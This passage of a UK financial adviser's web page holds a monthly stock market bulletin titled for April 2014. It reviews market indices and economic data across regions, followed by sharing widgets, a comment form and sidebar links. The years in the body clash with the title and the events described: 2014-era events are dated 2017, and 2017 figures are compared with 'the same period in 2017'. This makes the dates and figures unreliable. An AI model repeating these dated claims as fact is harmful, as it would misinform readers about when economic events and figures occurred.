million.\r\n\r\n&nbsp;\r\n\r\nThe FTSE-100 index had a disappointing month, falling by 3% to finish March at 6,598. At the end of the first quarter of 2017 it is down 2% on a year to date basis.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div class=\"clearboth\"></div>\r\n<div class=\"demo-sep sep-single\" style=\"margin-top: 20px; margin-bottom: 20px;\"></div>\r\n&nbsp;\r\n<h1><span style=\"color: #0000ff;\"><b>Europe </b></span></h1>\r\n&nbsp;\r\n\r\nMarch saw contrasting fortunes for France and Italy, the second and third biggest Eurozone economies. In France the central bank predicted growth of just 0.2% for the first quarter – unchanged from an earlier estimate and down on the 0.3% growth in the final quarter of 2017.\r\n\r\n&nbsp;\r\n\r\nFrench industrial production also fell by 0.2% against expectations of 0.2% growth.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nMeanwhile Italy posted its biggest rise in industrial production for two years, up 1% in January and comfortably ahead of all the forecasts. This confirmed a slow but gradual recovery in the country, which finally came out of its longest post-war recession in the final quarter of 2017.\r\n\r\n&nbsp;\r\n\r\nThat said, industrial production remains 24% lower than in 2008, so there is still some way to go…\r\n\r\n&nbsp;\r\n\r\nFigures released for January showed that Germany had a €15bn trade surplus in January (up from a revised figure of €13.9bn for the previous month – and as a comparison the UK had a trade deficit of £22bn in the three months to December 2017).\r\n\r\n&nbsp;\r\n\r\nThe German inflation rate fell to 1% in March, a 3½ year low and down from 1.2% in February. There was also good news on unemployment which fell more than expected in March, as the German economy was boosted by relatively mild winter weather. The number unemployed fell by 12,000 – against analysts’ predictions of 7,500.\r\n\r\n&nbsp;\r\n\r\nOn the stock markets the German DAX index ended March 1% down at 9,556, while the French CAC-40 index was virtually unchanged at 4,391.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div class=\"clearboth\"></div>\r\n<div class=\"demo-sep sep-single\" style=\"margin-top: 20px; margin-bottom: 20px;\"></div>\r\n&nbsp;\r\n<h1><span style=\"color: #0000ff;\"><b>USA</b></span></h1>\r\n&nbsp;\r\n\r\nIn the US the news was less good – the University of Michigan’s index of consumer sentiment fell, even though personal spending rose in February. It seems that Americans are spending now as they feel less confident about having the money to spend in the future.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nGDP growth was revised up to 2.6% for the final quarter of 2017 and jobless claims were down to a 4 month low. But manufacturing slowed in March and figures for February confirmed another near $40bn trade deficit – a figure the US Government seems powerless to do anything about.\r\n\r\n&nbsp;\r\n\r\nFor now President Obama appears to have won his battle with Congress, but the race to succeed him is gradually cranking up (with Hilary Clinton still the favourite). Expect to hear the words ‘lame’ and ‘duck’ around this time next year.\r\n\r\n&nbsp;\r\n\r\nNo lame ducks in the Zuckerberg household where Mark (not yet 30) has seen his fortune rise by $15bn over the past two years due to the strong performance of Facebook shares. I believe I was sceptical at the time of the flotation. So that would be a large slice of humble pie…\r\n\r\n&nbsp;\r\n\r\nThe Dow Jones index managed to stagger up by 1% in March, with the index closing at 16,458 – fractionally down on a year-to-date basis.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div class=\"clearboth\"></div>\r\n<div class=\"demo-sep sep-single\" style=\"margin-top: 20px; margin-bottom: 20px;\"></div>\r\n&nbsp;\r\n<h1><span style=\"color: #0000ff;\"><b>Far East </b></span></h1>\r\n&nbsp;\r\n\r\nDespite the Chinese Government announcing a target of 7.5% growth for the next 12 months, several indicators released in March suggested that the Chinese economy is slowing down.\r\n\r\n&nbsp;\r\n\r\nIndustrial production for the first two months of 2017 was 8.6% up on the same period in 2017, but the expectation had been for 9.5% growth. This was the worst performance since 2009 and was partly due to strikes and industrial unrest in factories across China.\r\n\r\n&nbsp;\r\n\r\nConsumer spending also appears to be running out of steam, with the growth in retail sales in January and February the slowest for three years. That said it was up by 11.8% (a figure the West can’t even dream about) but expectations had been for 13.5%.\r\n\r\n&nbsp;\r\n\r\nWith investment in fixed assets by business also down, these are worrying signs for the Chinese economy, which will have a “drag” effect on the rest of region.\r\n\r\n&nbsp;\r\n\r\nPresident Li Keqiang spoke of “severe challenges” and there were suggestions that the Central Bank could announce a series of measures to inject some impetus into the economy.\r\n\r\n&nbsp;\r\n\r\nJapan’s economy also grew more slowly than expected in the fourth quarter of 2017, and again, both business investment and consumer spending fell below expectations.\r\n\r\n&nbsp;\r\n\r\nNo such worries in South Korea where the trade surplus for March improved to $4.19bn, up from $933m the previous month. Exports jumped to the second-highest figure on record due to higher demand from the USA and Europe.\r\n\r\n&nbsp;\r\n\r\nThe South Korean and Japanese stock markets were virtually unchanged at the end of March, whilst China fell by just 1% to 2,033. The Hong Kong market declined by 3% to 22,151 and is now down by 5% for the year as a whole.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div class=\"clearboth\"></div>\r\n<div class=\"demo-sep sep-single\" style=\"margin-top: 20px; margin-bottom: 20px;\"></div>\r\n&nbsp;\r\n<h1><span style=\"color: #0000ff;\"><b>Emerging Markets </b></span></h1>\r\n&nbsp;\r\n\r\nIt’s hardly surprising that the Russian market fell significantly in March, given the threat of economic sanctions. The main index ended the month down 5% at 1,369 – down 9% on a year-to-date basis.\r\n\r\n&nbsp;\r\n\r\nHowever, figures for the last quarter of 2017 confirmed that the Russian economy was doing better than expected: it grew by 2% for the final three months of last year, against expectations of 1.3%.\r\n\r\n&nbsp;\r\n\r\nAs indicated above, there were much better returns from the other major emerging markets, with the Indian index up 6% in the month at 22,386 and the Brazilian index up 7% to 50,415 (although it is still down overall in 2017).\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2><span style=\"color: #0000ff;\"><b>And finally…</b></span></h2>\r\n&nbsp;\r\n\r\nMany London estate agents had to be rushed to hospital with acute excitement (or greed) in March, when a study was published suggesting that the average central London flat will cost £36m by the year 2050.\r\n\r\n&nbsp;\r\n\r\nLondon Central Portfolio launched a £100m fund to buy flats in ‘prime’ areas of London (that is, the area surrounding Hyde Park, from Notting Hill to Pimlico) confident that its prediction of 9% a year annual growth would become a reality, with or without the help of Russian oligarchs.\r\n\r\n&nbsp;\r\n\r\nSadly none of us in the office own a flat in Notting Hill or moonlights as an oligarch, so we’ll back at the beginning of May with the next monthly bulletin.\r\n\r\n&nbsp;\r\n\r\nIn the meantime we’ll be happy to answer your questions on the Budget or any other aspect of financial planning.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"meta-info\">\r\n\r\n&nbsp;\r\n<div class=\"vcard\">By <span class=\"sep\">|</span>Categories: <a title=\"View all posts in Investments\" href=\"../category\" rel=\"category tag\">Investments</a>, <a title=\"View all posts in Wealth Management\" href=\"../category/wealth-management/\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a title=\"Comment on April 2014 Stock Market Bulletin\" href=\"../april-2014-stock-market-bulletin/\">0 Comments</a></div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"share-box\">\r\n\r\n&nbsp;\r\n<h4></h4>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"facebook\"><a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/&amp;p[title]=April%202014%20Stock%20Market%20Bulletin\" target=\"_blank\" rel=\"nofollow\">\r\nFacebook\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nFacebook\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"twitter\"><a href=\"http://twitter.com/home?status=April+2014+Stock+Market+Bulletin%20http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/\" target=\"_blank\" rel=\"nofollow\">\r\nTwitter\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTwitter\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"linkedin\"><a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/&amp;title=April%202014%20Stock%20Market%20Bulletin\" target=\"_blank\" rel=\"nofollow\">\r\nLinkedIn\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nLinkedIn\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"reddit\"><a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/&amp;title=April%202014%20Stock%20Market%20Bulletin\" target=\"_blank\" rel=\"nofollow\">\r\nReddit\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nReddit\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"tumblr\"><a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fapril-2014-stock-market-bulletin%2F&amp;name=April+2014+Stock+Market+Bulletin&amp;description=We+started+last+month%E2%80%99s+bulletin+in+the+Crimea%2C+with+Russian+troops+in+de+facto+control+of+the+peninsula.+Well%2C+the+Crimea+is+now+part+of+Russia+again+and+the+collected+denunciations+and+threatened+sanctions+....\" target=\"_blank\" rel=\"nofollow\">\r\nTumblr\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTumblr\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"google\"><a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/\" target=\"_blank\" rel=\"nofollow\">\r\nGoogle +1\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nGoogle +1\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"tf-pinterest\"><a href=\"#\">\r\nPinterest\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nPinterest\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"email\"><a href=\"mailto:?subject=April 2014 Stock Market Bulletin&amp;body=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/\">\r\nEmail\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nEmail\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"about-author\">\r\n\r\n&nbsp;\r\n<div class=\"title\">\r\n<h2>About the Author:</h2>\r\n<div class=\"title-sep-container\"></div>\r\n</div>\r\n&nbsp;\r\n<div class=\"about-author-container\"></div>\r\n&nbsp;\r\n\r\n</div>\r\n<!-- You can start editing here. -->\r\n\r\n<!-- If comments are open, but there are no comments. -->\r\n<div id=\"respond\" class=\"comment-respond\">\r\n\r\n&nbsp;\r\n<div class=\"title\"></div>\r\n<small><a id=\"cancel-comment-reply-link\" style=\"display: none;\" href=\"../april-2014-stock-market-bulletin/\" rel=\"nofollow\">Cancel reply</a></small>\r\n\r\n<form id=\"commentform\" class=\"comment-form\" action=\"/\" method=\"post\">&nbsp;\r\n<div id=\"comment-input\"><input id=\"author\" class=\"input-name\" tabindex=\"1\" name=\"author\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Name (required)\" /><input id=\"email\" class=\"input-email\" tabindex=\"2\" name=\"email\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Email (required)\" /></div>\r\n&nbsp;\r\n<div id=\"comment-textarea\"></div>\r\n<p class=\"form-submit\"><input id=\"comment-submit\" name=\"submit\" type=\"submit\" value=\"Post Comment\" /><input id=\"comment_post_ID\" name=\"comment_post_ID\" type=\"hidden\" value=\"8121\" /></p>\r\n&nbsp;\r\n<p style=\"display: none;\"><input id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" type=\"hidden\" value=\"ed534b789c\" /></p>\r\n&nbsp;\r\n<p style=\"display: none;\"><input id=\"ak_js\" name=\"ak_js\" type=\"hidden\" value=\"25\" /></p>\r\n&nbsp;\r\n\r\n</form></div>\r\n<!-- #respond -->\r\n<script type=\"text/javascript\"><![CDATA[ jQuery(document).ready(function () { jQuery(\'#commentform\').submit(function () { _gaq.push( [\'_setAccount\', \'UA-10958181-3\'], [\'_trackEvent\', \'comment\', \'submit\'] ); }); }); ]]></script>\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div id=\"sidebar\" style=\"display: none;\">\r\n\r\n&nbsp;\r\n<div id=\"text-24\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big></center>people who get our best financial wisdom on a weekly basis.\r\n<a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" target=\"_blank\"><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<div id=\"recent_works-widget-2\" class=\"widget recent_works\"><p>\r\n</p>\r\n<div class=\"heading\"><p>\r\n</p>\r\n<p>New Guides</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<div class=\"recent-works-items clearfix\">&#13;\r\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\r\n					</a>&#13;\r\n				</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\"><p>\r\n</p>\r\n<div class=\"tab-holder\">\r\n<p>&#13;\r\n			</p>\r\n<p>\r\n</p>\r\n<div class=\"tab-hold tabs-wrapper\">\r\n<p>&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<ul id=\"tabs\" class=\"tabset tabs\">\r\n</p>\r\n<li><a href=\"#tab-popular\">Popular</a></li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n															</p>\r\n<p>\r\n</p>\r\n<li><a href=\"#tab-recent\">Recent</a></li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</ul>\r\n<p>\r\n</p>\r\n<div class=\"tab-box tabs-container\">\r\n<p>&#13;\r\n										</p>\r\n<p>\r\n</p>\r\n<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">\r\n<p>&#13;\r\n												</p>\r\n<p>\r\n</p>\r\n<ul class=\"news-list\">\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										October 12th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../best-annuity-rates/\">&#13;\r\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										March 21st, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										September 10th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\r\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										September 18th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										September 5th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n													</ul>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n															</p>\r\n<p>\r\n</p>\r\n<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">\r\n<p>&#13;\r\n												</p>\r\n<p>\r\n</p>\r\n<ul class=\"news-list\">\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 10th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../5-facts-know-annuities/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 9th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n													</ul>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n			</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<div id=\"categories-3\" class=\"widget widget_categories\"><p>\r\n</p>\r\n<div class=\"heading\"><p>\r\n</p>\r\n<p>Post Categories</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var dropdown = document.getElementById(\"cat\"); function onCatChange() { if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></a>\r\n\r\n</div>\r\n<div id=\"social_links-widget-2\" class=\"widget social_links\">\r\n<div class=\"heading\">\r\n\r\nGet Social\r\n\r\n</div>\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"rss\"><a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nRSS\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"twitter\"><a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTwitter\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n<div id=\"text-23\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\" /></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n	</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<footer class=\"footer-area\">\r\n</p>\r\n<div class=\"avada-row\">\r\n<p>&#13;\r\n			</p>\r\n<p>\r\n</p>\r\n<section class=\"columns columns-3\">\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\"><p>\r\n</p>\r\n<p>Our Latest Posts</p>\r\n<p>\r\n</p>\r\n<ul>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n				</ul>\r\n<p>\r\n</p>\r\n<div style=\"clear:both;\"/></div>\r\n<p>\r\n</article>\r\n<p>\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>\r\n</p>\r\n<p>Contact Info</p>\r\n<p>\r\n</p>\r\n<div class=\"contact-info-container\">\r\n<p>&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p class=\"address\">Manchester &amp; London</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p class=\"phone\">Phone: </p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		